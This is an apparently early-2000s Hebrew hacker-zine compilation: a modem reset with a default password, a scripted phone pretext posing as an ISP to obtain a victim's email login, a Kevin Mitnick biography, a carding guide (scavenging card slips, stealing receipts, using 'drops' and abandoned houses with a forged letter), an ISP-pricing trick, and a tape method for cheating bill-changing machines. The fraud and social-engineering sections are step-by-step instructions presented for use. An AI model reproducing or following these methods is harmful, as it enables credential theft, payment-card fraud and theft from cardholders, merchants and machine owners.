‫אם אתם רוצים לעשות ישר ריבוט תכתבו את זה‪ .‬קודם כל תצטרכו סיסמא (לקח לי שנים לגלות‬
‫אותה(לפצח))‬
‫‪password = xxxxxxxx‬‬
‫]‪ )xxxxxxxx] = )password‬כן כן‪ ,‬בזק הדפוקים שמו על המודם את הסיסמא הנפוצה ביותר (‬
‫‪.)password‬ץ‬
‫אז הססימא היא ‪ password‬ואז אתם יכולים לעשות שתי דברים‪:‬‬
‫‪ .1‬לכתוב ‪ help‬ולקבל את כל התכונות שאפשר לשנות‪,‬‬
‫אבל אני לא ממליץ לגעת שם רק אם אתם יודעים מה אתם עושים‪.‬‬
‫‪ .2‬לכתוב ‪ reset‬ולחכות‪ .‬הוא יתאחל בשבילכם את המודם והכל יהיה בסדר‪.‬‬
‫מקווה שזה תוסף נאה והראה לכם עוד דברים על המודם אורכית ועל בזק‪.‬‬
‫נ‪.‬ב‪ .‬בזק הגבילה את המרכזיות שוב פעם בתאריך ‪ 19/02/01‬אז אם אתם משמ גולשים לאט עכשיו‪,‬‬
‫אז בזק אשמים תתבעו אותם או תתנתקו מהם (זה מה שאני הייתי עושה)‪.‬‬
‫אם אתם באותה מהירות עדיין אז יש לכם מזל ואני כמעט בטוח שכל מי שעם מודם אורכית נשאר‬
‫רגיל‪.‬‬
‫אני מה זה מרחם עליכם ‪ -‬מחזיקי אלקטל !‬
‫‪pirs[i]ng‬‬
‫שימוש בפסיכולוגיה כדי לגנוב סיסמאות‪.‬‬
‫הערות‪/‬אזהרות כלליות‪:‬‬
‫אנו‪ ,‬ארגון ההאקרים הישראלי‪ ,‬לא אחראים לשום נזק שייגרם עקב הקריאה הן בצד המשפטי והן‬
‫בצד הפיזי‪ ,‬כל האחריות מוטלת על הקורא בלבד!‬
‫טקסט זה נכתב על מנת להעביר למשתמש יידע נוסף ולא על מנת לגרום נזק כלשהו!‬
‫יש כיום המון שיטות לגניבת כל מיני סיסמאות בכדי להשיג גישה לכל מיני דברים‪.‬‬
‫אני אראה לכם שיטה אחידה שעובדת להשגת כל סוגי הסיסמאות‪ .‬לא צריכים כל ידע קודם‬
‫במחשבים‪.‬‬
‫מה שכן צריכים זה אמצעי תיקשור כגון אימייל‪ ,‬טלפון‪ ,‬דואר וכו'‪.‬‬
‫איך זה עובד? אני אתן דוגמא‪.‬‬
‫הטלפון בבית של משפחת פדלמן מצלצל‪ .‬מר פדלמן עונה‪ .‬השיחה מתנהלת‪...‬‬
‫מר פדלמן‪ :‬הלו?‬
‫אתם‪ :‬שלום‪ ,‬מדבר מתן מאינטרנט זהב‪.‬‬
‫מר פדלמן‪ :‬אה‪ ,‬אתם אלה שאחראים לאינטרנט שלי‪ ,‬נכון?‬
‫אתם‪ :‬נכון מאוד‪ .‬לכן אני מתקשר‪ .‬האם במקרה ניסית לגשת לאימייל שלך היום?‬
‫מר פדלמן‪ :‬לא‪ ,‬הייתי מאוד עסוק היום‪ ...‬למה?‬
‫אתם‪ :‬הממ‪ ,‬כן‪ ,‬גם אני‪ .‬היו לנו בעיות עם שרת הדואר‪ .‬הוא קרס וכל החשבונות נמחקו‪.‬‬
‫מר פדלמן‪ :‬וואי‪ ...‬מה אתה אומר? אז כמה זמן ייקח עד שאני אוכל לבדוק שוב את האימייל שלי?‬
‫אתם‪ :‬אני מקווה שהכל יתוקן בדקות הקרובות‪ .‬אני אחראי על איסוף המידע מחדש והכנסתו חזרה‬
‫למחשב‪.‬‬
‫האם במקרה את הזוכר מה היה שם המשתמש שלך?‬
‫מר פדלמן‪ :‬שם משתמש?‬
‫אתם‪ :‬כן‪ .‬זה החלק שבא לפני סימן ה @ בכתובת האימייל שלך‪.‬‬
‫מר פדלמן‪ :‬אה‪ .‬הבנתי‪ .‬אם כך אז שם המשתמש שלי הוא ‪.fedelman‬‬
‫אתם‪ :‬יופי‪ ,‬מצויין‪ .‬אני אוסיף את זה ברגע זה‪.‬‬
‫מר פדלמן‪ :‬אוקי‪ ,‬תודה‪.‬‬
‫אתם‪ :‬מה תרצה שתהיה הסיסמא שלך?‬
‫מר פדלמן‪ :‬אני חייב לבחור סיסמא חדשה‪ ,‬או שאני יכול גם להשתמש בישנה?‬
‫אתם‪ :‬איך שנוח לך‪ .‬אתה יכול פשוט להשתמש בישנה‪.‬‬
‫מר פדלמן‪ :‬סבבה‪ .‬הישנה קל לי לזכור‪ .‬זה ‪.qwert‬‬
‫אתם‪ :‬רק רגע‪...‬‬

‫אוקי‪ .‬הכל תקין עכשיו‪ .‬תוכל לבדוק את האימייל שלך בעוד דקה או שתיים‪.‬‬
‫מר פדלמן‪ :‬תודה רבה‪.‬‬
‫אתם‪ :‬אין בעד מה‪ ,‬שיהיה לך יום נעים‪.‬‬
‫מר פדלמן‪ :‬תודה‪ .‬גם לך‪.‬‬
‫‪-‬סוף שיחה‪-‬‬
‫המממממ‪ ...‬תתאמנו עם חברים‪ ,‬עד שהולך לכם חלק‪.‬‬

‫שכל חבר יישחק חלק אחר‪ .‬פעם אחת זה שעובדים עליו‪ ,‬ופעם אחת ההאקר‪.‬‬
‫ככה תתחלפו כל פעם‪ .‬עליכם להשתמש בדימיון‪ ,‬להיות פתוחים למחשבות‪,‬‬
‫ולשים את עצמיכם במצב של מישאתם טוענים שאתם‪.‬‬
‫כדי להיות חלקלקים עליכם להתאמן‪ ,‬להתאמן‪ ,‬להתאמן ולהתאמן‪ .‬תיהנו‪.‬‬
‫‪by wamaw‬‬
‫קטעים מהביוגרפיה של ההאקר‬
‫המפורסם בעולם שסופרו ע"י‬
‫האסיר פיאו לי‪.‬‬
‫כל אותם השנים שלפני ההודאה‪ ,‬לא נתנו לו להגן על עצמו‪.‬‬
‫הגישה לספרייה ‪ -‬אסורה‪ ,‬פגישות ‪ -‬אסורות‪ ,‬שום אמצעי תקשורת‪ .‬שום מחשבים‪ ,‬אפילו לאפ טופ‬
‫מסכן (ללא מודם‪ ,‬ללא יציאות ‪ ,pcmcia‬אפילו ללא פורטים חיצוניים) נראה לסוהרים כצעצוע מסוכן‬
‫מדי בידיו של ההאקר המפורסם‪.‬‬
‫לפעמים הוא היה מקבל לידיו מחשב‪ ,‬לשימוש של כמה ימים‪ ,‬אחרי זאת המחשב היה נלקח ממנו‬
‫והיה מושמד אחרי בדיקה מדוקדקת של וועדה מיוחדת‪.‬‬
‫הוא ישב בכלא במשך יותר ‪ 5‬שנים‪ .‬בית הסוהר של לוס‪-‬אנג'לס‪ ,‬תודות לו הכי מפורסם בעולם‬
‫הווירטואלי‪ .‬כמו כן הכי שמור במדינה כולה‪.‬‬
‫במשך כל אותו הזמן הוא התנגד‪ ,‬ניסה להוכיח את חפותו‪.‬‬
‫"מה שהניע אותי היה סקרנות ילדותית פשוטה‪ ,‬יכולתי להיכנס לביתכם‪ ,‬לעלעל בספרי הספרייה‬
‫שלכם‪ ,‬לפתוח את המקרר שלכם… אבל אני מעולם לא לקחתי דבר"‪.‬‬
‫בספטמבר ‪ 1998‬הוגש נגדו כתב אישום‪ ,‬התובע דרש בידיד של מאתיים שנים מהעולם החיצון…‬
‫רוצח בקליפורניה‪ ,‬במקרה הכי טוב יקבל ‪ 3‬שנות מאסר‪ .‬אילו קווין מיטניק היה רוצח‪ ,‬הוא בטח היה‬
‫משתחרר בפחות זמן‪ .‬אבל‪ ,‬הוא לא רצח אף אחד‪.‬‬
‫ב ‪ 4‬באפריל‪ ,1999 ,‬אסיר בית בכלא הסגור של לוס‪-‬אנג'לס מספר ‪ 89950-012‬קווין דויד מיטניק (נולד‬
‫ב ‪ )6.8.1963‬הודה באשמה והגיע לעסקת טיעון עם הרשויות‪.‬‬
‫"… האם אי פעם שדדו אותך בלילה‪ ,‬בסמטה חשוכה? כאשר יש לך סכין על הגרון‪ ,‬אתה ממש מצטער‬
‫שבכיסים יש לך יש רק גרושים‪ .‬אתה יודע איך זה עובד‪ ,‬אתה יושב ‪ 3‬שבועות‪ ,‬לבד‪ ,‬מת משעמום‪.‬‬
‫אחרי זאת מביאים לך תנ"ך מקומט בכריכה רכה וזוג ספרים של שומרי החוק השנואים‪ ,‬בכל אחד‬
‫מהם‪ ,‬עשרות סיפורים על איך איזה חרא גנב את הארנק מסבתא זקנה ובגלל זה היא לא יכלה לקנות‬
‫לעצמה תרופות ו ‪ 911‬לא יכלו לעזור לה‪ .‬וזהו‪ .‬אתה מבין שאתה כבר לא יכול לצאת מזה‪ .‬אבל‪ ,‬אני‬
‫לא ממש מאמין שהחבר שלנו קנה את זה‪ ,‬הוא הרי גאון מטומטם‪ ,‬יכול להיות שחשב על משהו…"‬
‫הנה לפניכם כרונולוגיה של הפעולות הלא חוקיות הראשוניות של "מלך ההאקרים של כדור הארץ"‪:‬‬
‫שנות השבעים‪ .‬פריקינג (‪ ,)phreaking‬ידוע יותר כפשע הקשור בטלפון‪ ,‬הפיכת הטלפון הביתי שלו‬
‫למאין טלפון ציבורי‪ ,‬בהרמת השפופרת‪ ,‬במקום צליל של קו שומעים קול צרוד של גבר המבקש‬
‫להכניס ‪ 20‬סנט‪.‬‬
‫‪ - 1980‬פריצה לרשת המחשבים של סגל בית הספר שלו‪ ,‬לא נגע לא במאגר הציונים ולא בקבצים‬
‫האישיים של המנהל‪ ,‬קווין ניסה את כוחו בלבד‪.‬‬
‫‪ - 1981‬פריצה מוצלחת לרשת המחשבים של מערכת חיל האוויר במדינתו‪ ,‬מדינת קולורדו‪.‬‬
‫קיבל נזיפה מהרשויות‪.‬‬
‫‪ - 1982‬לא ממש פריצה במובן של מחשבים‪ ,‬קוויו ועוד שני חברי הצליחו לחדור לבניין של חברת‬
‫‪ pacific bell‬ולגנוב ספרי הדרכה של ‪ cosmos’y‬ושל ‪. microport’y‬‬
‫המעצר הראשון ‪ 3 -‬חודשים בלוס‪-‬אנג'לס‪ ,‬במרכז הטיפול בעבריינים צעירים ‪ +‬שנה על תנאי‪.‬‬
‫שבועיים אחרי השחרור‪ ,‬מעצר של ‪ 6‬חודשים על שימוש לא חוקי במחשב האוניברסיטה לצורך גישה‬
‫לרשת ה ‪ arphanet‬של הפנטגון‪.‬‬
‫שחצי שנה הזאת ה ‪ arphanet‬הפכה לרשת לצורכי חינוך בלבד‪ ,‬וקווין לאחד המומחים הטובים‬
‫ביותר בנושא הטלפונים הסולריים ובנושא רשתות מחשבים‪.‬‬
‫"… הוא היה ילדון‪ ,‬אוקי? ואני סחבתי בשבילו ספרים מהספרייה‪ ,‬אז קראו לו עכברוש‪ ,‬הוא נגס‬
‫בסלע מדעי השטן ביהירות רבה‪ .‬הוא עצמו אהב שקראו לו "קונדור"‪ .‬איך שהילדים הלבנים האלה‬
‫אוהבים כינויים קולנועיים…"‬
‫במשך ‪ 5‬השנים הבאות קווין הצליח להימנע מסכסוכים עם החוק‪ ,‬כלפי חוץ‪ ,‬הוא ניהל חיים‬
‫משפחתיים שקטים בעיר קליפורנית קטנה ‪" -‬אלך האלונים" (‪ .)thousand oaks‬סוף האידיליה קרה‬
‫בסמוך לחג המולד בשנת ‪.1987‬‬
‫‪ 3 - 1988‬שנים על תנאי‪ ,‬על גניבת תוכנות מחברת ‪ , santa cruz operation‬בסוף השנה קווין שוב‬
‫מאחורי הסורגים‪ .‬הוא מואשם בגניבת קוד מקור פרטי ממעבדת המחקר של‬
‫‪ digital equipment corporation‬שנמצאת בפאלו אלטה‪ ,‬המטרה הייתה גרסה לא חוקית של מערכת‬
‫ההפעלה ‪ . vms‬דבר זה עלה לקווין בשנת מעצר‪.‬‬
‫חוץ מזה קווין נשלח לקורס של "ריפוי מהתמכרות למחשבים" של ‪ 6‬חודשים‪.‬‬
‫תנאי השחרור‪ :‬לעולם לא להתקרב למחשב עם מודם‪.‬‬

‫אז מיטניק לא מתקרב‪ ,‬משתדל למלא אחרי כללי המשחק‪ .‬הדברים קורים כבאורך פלא‪:‬‬
‫הטלפון של הקצין מבחן מנותק‪ ,‬חשבון הבנק של השופט נעלם‪ ,‬ממאגרי המידע של בית המשפט‬
‫בסנטה קרוז נעלם המידע על מעצרו ומשפטו של קווין‪.‬‬
‫מדברים על כך שבשנת ‪ 1990‬אפילו ראו את קווין בישראל‪ ,‬לשם הוא הגיע בכדי להיפגש עם חבריו‬
‫ההאקרים‪ ,‬למרות האיסור לצאת לחו"ל‪.‬‬
‫בשנים הבאות‪ ,‬חייו של מיטניק נכנסים לנתיב נורמלי‪ ,‬ואז פתאום‪ ,‬מות אחיו‪ ,‬האדם הקרוב אליו‬
‫ביותר‪.‬‬
‫את הפעולות הבאות של מיטניק מסבירים בצורות שונות‪ ,‬יש האומרים שזה ניסיון להלחם בדיכאון‬
‫ויש הטוענים שזה הרצון להשיג כמה שיותר כסף בפרק זמן קצר‪.‬‬
‫בזמן הזה הוא חשוד בבקשה לקבלת מסמכים סודיים ממשרד התחבורה של ארה"ב‪ ,‬הבקשה נענתה‬
‫כיוון שהיא נשלחה ממשטרת המדינה‪.‬‬
‫כמו כן הוא חשוד בפריצה לרשתות הפנטגון וה ‪ fbi‬באותה שנת ‪.1992‬‬
‫מנסים לתלו עליו את האשמה בציתות למחלקת האבטחה של חברת ‪.pacific bell‬‬
‫ה ‪ fbi‬עורך חיפוש בביתו של קווין‪ ,‬המצב מתלקח ומיטניק נעלם למספר שנים‪.‬‬
‫בין השנים ‪ 1994 - 1992‬הוא חי בשקט בסיאטל תחת השם בראיין מריל‪ .‬בתקופה הזאת חושדים‬
‫שהוא אחראי לגניבת מערכות הבקרה של תקשורת סלולרית של החברות ‪ motorola, nokia‬ו‬
‫‪ , .mccaw cellular communication inc‬פריצה של מערכת האבטחה של חברת‬
‫‪ ,sun microsystems‬וגם גניבת גרסת ההרצה של מערכת אבטחת הרשתות ‪. satan‬‬
‫אז הוא כמעט נתפס‪ ,‬המשטרה הצליחה לעלות בחכתה מספר טלפונים סלולריים‪ ,‬ספרים בנושאים‬
‫של מחשבים‪ ,‬רשתות ותקשורת ומכשיר להאזנה לתדר של המשטרה‪.‬‬
‫חג המולד ‪ - 1994‬כמתנת חג החליט קווין להביא לעולם משחק חתול‪-‬עכבר עם אחד המומחים‬
‫הגדולים ביותר בעולם במערכות אבטחה ‪ -‬ציטומו שימומורה‪.‬‬
‫ציטומו לא רק שהיה מוכן למשחק עם קווין אלא גם הכין לו מלכודת‪ ,‬למעשה כל אחד יכל ליפול בפח‬
‫הזה‪ ,‬לא הייתה כאן מטרה לתפוס את קווין‪.‬‬
‫מבחוץ הכל נראה כך‪:‬‬
‫המומחה הבינלאומי לאבטחת מחשבים‪ ,‬ציטומו שימומורה נסע לחופשה לנבדה ו"שכח" לנתק מן‬
‫הרשת את מחשבו המוגן‪ .‬המלכודת הייתה בכך שכל דבר שקרה במחשב תועד בלוג במחשב אחר‪.‬‬
‫כאשר המחשב נפרץ‪ ,‬ציטומו מיד קיבל על כך הודעה‪.‬‬
‫לפי המומחיות של הפריצה‪ ,‬הפיתיון נתפס ע"י מישהו משהו גדול‪.‬‬
‫אם קודם ציטומו לא התכוון לנקום‪ ,‬אך אחרי שלא רק נגנבו ממחשבו קבצים ותוכנות אבטחה‪ ,‬גם‬
‫הושארו הודעות קוליות מעליבות‪.‬‬
‫ציטומו התחיל לפעול לתפיסתו של מיטניק‪ ,‬הוא פנה בבקשת עזרה ל ‪ fbi‬ולבסוף הצליח לגלות את‬
‫מיקומו של מיטניק ברדיוס של ‪ 2‬ק"מ‪.‬‬
‫ב ‪ 15‬בפברואר ‪ 1995‬בשעה ‪ 01.30‬קווין נתפס‪.‬‬
‫ב ‪ 21.01.2000‬קווין שוחרר לבסוף‪ ,‬אבל עדיין אסור לו להשתמש במחשב ולהעביר הרצאות בנושא‬
‫מחשבים ולעבוד בכל משרה הקשורה למחשבים עד ה ‪ ,20.02.2003‬כאשר יהיה חופשי באופן סופי‪.‬‬
‫מעצרו של קווין לא הועיל הרבה בניסיון להפסיק את פעולות ההאקרים‪ ,‬אפילו נתן זיקה לפעולות‬
‫אלו כי במשך מעצרו המון האקרים פרצו לאתרים שונים תחת הסיסמא "חופש לקווין" ‪.free kevin -‬‬
‫‪by boris‬‬
‫כסף חינם‬
‫כאן ‪.e-man‬‬
‫היום אני אכתוב על ‪.carding‬‬
‫‪ carding‬הוא מונח שהומצא לשיטה שבא אנשים קונים בכרטיסי אשראי לא‪-‬שלהם באינטרנט‪.‬‬
‫זהו דבר מאוד מסוכן ולא מומלץ למתחילים שבנינו‪.‬‬
‫אני אכתוב על תהליך ה‪ carding‬מההתחלה‪ ,‬עד הסוף (הטוב והמר)‬
‫אז בואו נתחיל‪.‬‬
‫קודם כל‪ ,‬אתם בטח שואלי‪ ,‬מאיפה לעזאזל אני ישיג אשראי???‬
‫אז הנה התשובה‪:‬‬
‫יש שלוש שיטות שאני יודע עליהן‪ ,‬אני יתחיל מהמומלצת ביותר עד לא הכי מומלצת‪.‬‬
‫‪ )1‬אתם מכירים את החנויות העניות האלה שעדיין משתמשות ב"מגהץ" לחיוב אשראי?‬
‫אלו הן המטרות שלכם! לכו בלילה לפח שמאחורי החנות (לא לשכוח לבוא עם בגדים ישנים‬
‫ושחורים‪,‬פנס ותיק של טיול השנתי )‬
‫קפצו פנימה! אתם תגלו שכרגע קפצתם לאשפה הכי נקייה שראיתם בחיים‪ .‬חוץ מניירות‪ ,‬לא יהיה‬
‫שם כלום‪ .‬בכל מקרה‪ ,‬תפעילו את הפנס שלכם ותתחילו לחפש ניירות קטנים כאלה בצבע אפור‪.‬‬
‫בדרך כלל הם נמצאים איזה חבילה של ‪ 100‬בכל שקית זבל‪ .‬מצאתם? יופי! יש לנו כרגע כרטיסי‬
‫אשראי! (תלוי כמה היו שם)‪ .‬במקרה שבאמצע החיפוש שלכם אתם נתקלים בשומר‪ ,‬אל תזוזו! אם‬
‫הוא שמע אותם‪ ,‬ואומר לכם לצאת‪ ,‬אל תצאו‪ ,‬תתחילו לעשות קולות מפחידים‪ ,‬זה בדרך כלל עובד‬
‫(אתם יודעים‪ ,‬לילה חשוך והוא לבד‪ ,‬הוא מפחד בדיוק כמוכם‪ -‬כי שומרים פשוט לא יודעים מה הם‬
‫רוצים מהחיים שלהם ‪ ,‬או תדחפו לו כמה דולרים(שוחד) )‪ .‬אם הוא עדיין עומד שם ואומר לכם‬
‫לצאת‪ ,‬תכוונו עליו את הפנס שלכם‪ ,‬ובעוד הוא מסתנוור‪ ,‬תברחו משם! ‪ -‬כמו שאתם תברחו ממחבל‬
‫(רק אם אתם יכולים לקחת את השקית‪ ,‬קחו אותה)‪ .‬הגעתם הביתה? אל תצאו מהבית לפחות‬
‫שבועיים (לבית ספר מותר ‪ ):‬מצטער ‪.) ):‬‬
‫‪ )2‬תפרצו‪ ...‬לא ממש לבוא ולשבור חלונות‪ ,‬אני מתכוון ‪ .hacking‬אבל זה רק למי שיודע‪.‬‬
‫‪ )3‬זאת השיטה הכי פחות לא מומלצת‪ .‬אתם מכירים את המכונות להשכרת סרטים נכון? אתם‬
‫יודעים שאחרי שיוצא הסרט גם יוצאת חשבונית שעליה כתוב מספר כרטיס האשראי? עכשיו כן‪ .‬בכל‬
‫מקרה‪ ,‬תעמדו ליד המכונה כאילו אתם רוצים לבחור סרט‪ ,‬וכשמישהו אחר בא ומשכיר סרט‪ ,‬קחו את‬
‫החשבונית ותברחו משם!‬
‫*** רק אם לאותו אחד שבא להשכיר סרט יש כרטיס אשראי בין לאומי (אני יגיד מהם בהמשך) אז‬
‫עושים את השיטה הזאת‪.‬‬
‫אוקי‪ ,‬בהנחה שהגעתם הביתה בריאים ושלמים (טוב‪ ..‬רק שלמים) אפשר להתחיל את המיון! תמיינו‬
‫ככה‪,‬‬
‫כרטיסי אשראי שמתחילים ב‪ 60 ,52 - 51 ,49 - 40 :‬ו ‪( 37‬זה כל מה שאני יודע מהסדרה של ‪ )3‬בצד‬
‫ימין‬
‫כל האחרים‪ ,‬צד שמאל‪.‬‬
‫מה שיש לנו עכשיו זה ככה‪:‬‬
‫צד ימין‪ ,‬כרטיסי אשראי מוכנים לשימוש!!!‬
‫צד שמאל‪ ,‬ערמה של זבל שצריך לשרוף‪.‬‬
‫כשאתם מחליטים שאתם רוצים לקנות תעשו את הדברים הבאים‪:‬‬
‫‪ )1‬תשיגו מחשב שיש לו גישה לאינטרנט והוא לא בבית שלכם (בית ספר וספרייה זה מושלם)‪.‬‬
‫‪ )2‬חובה אישור לעבודה על המחשב הזה‪.‬‬
‫‪ )3‬דרך מילוט שקטה‪.‬‬
‫תביאו אתכם כרטיס אשראי אחד מהרשימה שלכם‪ ,‬כנסו לאתר שבו אתם רוצים לקנות‪ ,‬ותקנו! (אבל‬
‫רק תוכנות להורדה בתשלום! לא לשלוח שום דבר הביתה!!!)‪ .‬במקרה שהאתר רוצה שגם תבחרו‬
‫באיזה סוג כרטיס אשראי אתם משלמים חוץ מהמספר‪ ,‬הנה הסוגים‪:‬‬
‫‪ :49 - 40‬ויזה‬
‫‪ :52 - 51‬מאסטרכארד‬
‫‪ :60‬דיסקברי‬
‫‪ :37‬אמריקן אקספרס‬
‫אם אתם רוצים לקנות דברים שצריך לשלוח הביתה‪ ,‬זה כבר סיפור אחר‪ ,‬אתם צריכים "‪."drops‬‬
‫‪ drops‬הם אנשים בעולם שאליהם אתם שולחים את מה שקניתם והם שולחים את זה אליכם הביתה‪,‬‬
‫ככה המשטרה לא יודעת מה קרה לחבילה‪.‬‬
‫קודם כל אתם צריכים ליצור קשר עם ‪ ,drop‬אני ממליץ לחפש ב‪.irc‬‬
‫אחרי שמצאתם לפחות ‪ 2‬דרופים‪ ,‬תגידו להם (אל תגידו שיש לכם ‪ 2‬דרופים‪ ,‬לכל דרופ תגידו שהוא‬
‫הדרופ היחיד) שאתם צריכים דרופ בלהבלה ותבקשו כתובת‪ .‬יש לכם ‪ 2‬כתובות? מגניב! עכשיו תגידו‬
‫לאחר הדרופים שהוא הולך לקבל חבילה בימים הקרובים והוא צריך לשלוח את זה אליכם הביתה‪,‬‬
‫אבל אל תתנו לו את הכתובת של הבית‪ ,‬אלה את הכתובת של הדרופ השני! לדרופ השני (הכי טוב‬
‫שיהיה ישראלי) תגידו לשלוח לכם את זה הביתה ותנו לו את הכתובת האמיתית‪ .‬אם אתם ממש‬
‫רוצים והדרופ הוא ישראלי‪ ,‬אפשר גם ללכת להפגש איתו אישית ולקחת את החבילה‪ ,‬אני ממליץ על‬
‫זה‪.‬‬
‫אל תשכחו לשלוח לכל דרופ משהו (מתנה בשויי ‪ 20‬דולר תספיק‪ ,‬כמובן מהכרטיס אשראי ולא‬
‫מהכסף שלכם ‪.) ):‬‬
‫אחרי שקיבלתם את החבילה‪ ,‬אל תתחילו להתלהב מזה ולספר לחברים!‬

‫תשמרו את החבילה בסוד עד יום ההולדת שלכם‪ ,‬ורק אז תגידו שקיבלתם את זה ליום ההולדת‪.‬‬
‫תתחדשו‪.‬‬
‫‪]by e-man [i.c.f‬‬
‫עוד שיטה‪ -‬כסף חינם ‪ -‬בלי דרופים‬
‫‪ .1‬אם אין לכם כוח לחפש דרופים שלחו את החבילה לבית נטוש או שעדיין לא‬
‫התיישבו בו וכל‪.‬‬
‫‪ .2‬הכינו מכתב שאומר‪:‬‬
‫__________________________________________________________‬
‫|‬ ‫| שלום אני מר "השם שקראתם לעצמכם בהזמנה "‬
‫|‬ ‫| מס' ת‪.‬ז‪" .‬מספר"‬
‫|‬ ‫| מס' "כרטיס אשראי"‬
‫|‬ ‫| מבקש להשאיר את החבילה ליד הדלת כאשר אני לא נמצא בבית‬
‫|‬
‫תודה רבה‬ ‫|‬
‫מר " השם שלו "‬ ‫|‬
‫חתימה‬ ‫|‬
‫|__________________________________________________________‬
‫*סליחה אבל לא היה לי כוח להשלים את הפסים שמשמאל ( מה זה משנה ‪)...‬‬
‫שהכל יראה אוטנטי ואמיתי ‪ .‬כי אם לא חבל עליכם ‪....‬‬
‫‪ .3‬כל יום תבוא ב‪ 7‬אחר הצהרים לבדוק את הבית ואם אתם רואים את החבילה קחו‬
‫אותה ותברחו ‪ ...‬כמה שיותר מהר ‪.‬‬

‫איך לקבל אינטרנט יותר זול מכולם? מאת ‪e-man‬‬
‫מושגים ‪:‬‬
‫‪ = isp‬ספק אינטרנט ‪.‬‬
‫‪---------------------------‬‬
‫אתם בטח יודעם כמה יקר השימוש באינטרנט בישראל‪...‬‬
‫‪ 19$‬לחודש‪..‬‬
‫אחותי‪ ,‬על מה?‬
‫אם אתם חושבים כמוני‪ ,‬זה בשבילכם‪:‬‬
‫התהליך הזה הוא לאמיצים בלבד ויכול לקחת ‪ 3‬חודשים או יותר‬

‫אבל בסוף זה משתלם‪.‬‬
‫הנה ההוראות‪:‬‬
‫‪ )1‬הירשמו לאיזה ‪ isp‬שאתם רוצים לתקופת ניסיון של ‪ 3‬חודשים‪.‬‬
‫‪ )2‬בתקופת ניסיון זו‪ ,‬התלוננו על כל מה שרק אפשר‪ ,‬כל שבוע ‪.‬‬
‫‪ )3‬אחרי שעברו ה‪ 3-‬חודשים המפרכים האלה‪ ,‬ה‪ isp‬שאליו נרשמתם ישאלו אתכם אם תרצו להמשיך‬
‫את תקופת הניסיון‬
‫תגידו שאתם לא רוצים כי ‪ isp‬מתחרה (שאותו תכינו מראש ונסביר עליו בהמשך) הציע לכם מחיר‬
‫טוב יותר‪.‬‬
‫‪ )4‬בינתיים ב‪ isp‬המתחרה‪ ,‬תשאלו אם כדאי לכם לעבור מה‪ isp‬הקודם שנרשמתם אליו ל‪ isp‬הזה‪,‬‬
‫כמובן שתקבלו "כן! בטח!" תגידו שאתם לא בטוחים כי ה‪ isp‬הקודם יותר טוב‪ ,‬הם ישאלו למספר‬
‫טלפון ושם ויגידו ביי‬
‫למחרת תקבלו טלפון מה‪ isp‬המתחרה עם הצעה יותר טובה מה‪ isp‬הקודם!‬
‫תגידו את זה ל‪ isp‬הקודם ותקבלו אינטרנט חינם! (כמובן לא חופשי חודשי אבל גם זה שווה!)‬
‫מה שיוצא לכם זה ככה‪:‬‬
‫‪ isp‬אחד מוזל מאוד עם חופשי חודשי‬
‫‪ isp‬אחר חינם בלי חופשי חודשי‬
‫כל מה שכתוב במאמר זה בדוק על ידי!‬
‫]‪by e-man [i.c.f‬‬

‫מזומן חינם‪ - ...‬איך לעבוד על מכונות שפורטות כסף‬
‫המאמר הזה יעסוק בדבר שכולנו אוהבים וצריכים (לא סקס יא ראש כחול!)‬
‫אני מדבר על ‪$$$‬כסף‪ ,$$$‬מי לא אוהב כסף?‬
‫מי לא צריך כסף?‬
‫מי לא משתמש בכסף?‬
‫אם ענית על אחת מהשאלות האלה "אני"‪ ,‬תעבור למאמר הבא‪.‬‬
‫בכל מקרה‪ ,‬בואו נעבור לחלק הרעיוני‪:‬‬
‫כולנו מכירים את המכונות האלה לפריטת כסף נכון?‬

‫רק תחשבו כמה כסף יש בפנים‪...‬‬
‫בוא נראה איך מכונה כזאת עובדת‪:‬‬
‫כשאתה מכניס שטר של ‪ 20‬שקל (אנחנו תפרנים שכחתם? ‪,) ):‬‬
‫המכונה סורקת אותו כדי למצוא סממנים שנמצאים בתוך השטר עצמו!‬
‫זאת אומרת שאם תכתוב ‪ 50‬שקל על נייר ותכניס אותו למכונה כל מה‬
‫שתקבל יהיה כאב ראש‪:( .‬‬
‫מה שאנחנו רוצים הוא לא לעבוד על המכונה‪,‬‬

‫אלה לא לאפשר למכונה לקחת מאתנו את השטר!‬
‫מכונות כאלה‪* ,‬אחרי* שקראו את השטר ופרטו אותו‪ ,‬רק אז הן בולעות את‬
‫השטר!‬
‫זאת אומרת שאנחנו לא רוצים לתת למכונה לקחת לנו את השטר היקר מכל‬
‫שלנו‪.‬‬
‫איך עושים את זה?‬

‫עכשיו הגענו לחלק המעשי‪:‬‬
‫‪ )1‬הכן לך מראש שטר של הסכום הרצוי (רצוי ‪ 20‬שקל כי מי רוצה להסתובב‬
‫עם ‪ 50‬או ‪ 100‬שקלים בארנק?)‬
‫‪ )2‬מצא את נקודת האמצע של השטר ועטוף אותו במסקנטייפ (סלוטייפ עבה‬
‫במיוחד)‬
‫זאת אומרת‪:‬‬
‫אם ככה נראה השטר‪:‬‬
‫אמצע‬
‫|‪|----------------------------------‬‬
‫‪| 20‬‬ ‫|‬
‫|‬ ‫|‬
‫|‬ ‫|‬
‫|‬ ‫שטר‬ ‫|‬
‫|‬ ‫|‬
‫|‬ ‫|‬
‫|‬ ‫| ‪20‬‬
‫|‪|----------------------------------‬‬
‫אז ככה יראה השטר אחרי ההדבקה שלנו‪:‬‬

‫אמצע‬
‫===================================‪----------------‬‬
‫‪|-------‬‬
‫===================================‬
‫‪| 20‬‬
‫===================================‬
‫|‬
‫===================================‬
‫|‬
‫שטר‬ ‫===================================‬
‫|‬
‫===================================‬
‫|‬
‫===================================‬
‫|‬
‫===================================‬
‫|‬
‫===================================‪----------------‬‬
‫‪|-------‬‬
‫מקרא ‪ < = = :‬מסקנטייפ‬
‫‪ )3‬מכניסים את השטר המחובר למסקנטייפ למכונה ופורטים את הכסף (אל‬

‫תעזבו את השטר!!!)‬
‫‪ )4‬מחזיקים את השטר חזק (הוא לא יקרע אם עשיתם את זה נכון)‬
‫‪ )5‬מחכים עד שהמכונה עוזבת את השטר ובבית מוציאים את המסקנטייפ‬
‫כל היופי בדבר הזה שאפילו אם השטר נקרע‪ ,‬עדיין קיבלתם את הסכום שלו‬
‫חזרה במטבעות ‪( ):‬ואפשר להדביק אותו חזרה ‪ ...‬ועוד לקנות דברים בזה )‪.‬‬
e-man [i.c.f]
‫דיבור ללא תשלום בטלפון ציבורי‬
‫זוהי הכתבה הראשונה של מילקי ‪ -‬אני צופה לו עתיד מזהיר‪...‬‬
